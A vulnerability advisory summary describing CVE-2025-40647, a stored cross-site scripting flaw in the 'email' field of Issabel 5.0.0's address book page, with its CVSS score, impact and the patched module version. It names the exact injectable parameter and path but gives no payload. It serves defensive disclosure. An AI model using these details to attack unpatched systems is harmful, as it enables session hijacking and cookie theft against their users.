CVE-2025-40647

Vulnerability

Overview

CVE-2025-40647 is a stored Cross-Site Scripting (XSS) vulnerability in Issabel version 5.0.0. The flaw resides in the address book functionality, specifically within the 'email' parameter at the path /index.php?menu=address_book. Due to insufficient input validation, an attacker can inject arbitrary JavaScript code that gets stored on the server and subsequently executed in the browsers of other users when they view the affected address book entry [1].

Exploitation

Details

The vulnerability requires authentication (low privileges) and user interaction from a victim. An attacker with access to the address book can craft a malicious payload in the email field. When a victim with higher privileges or another user accesses the same address book entry, the stored script executes within their session context. The CVSS v4.0 base score is 5.1 (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N), indicating network exploitability, low attack complexity, and a need for user interaction [1].

Impact

Successful exploitation can lead to session hijacking, sensitive data exfiltration (e.g., CSRF tokens, cookies), or malicious actions performed on behalf of the victim within Issabel. The impact is partially confined to the scope of the application (SC:L, SI:L in CVSS).

Mitigation

Status

Issabel has released a fix for this vulnerability in the issabel-pbx module version 5.0.0-2. Users are strongly advised to upgrade to at least this version. No workarounds are reported in the advisory [1].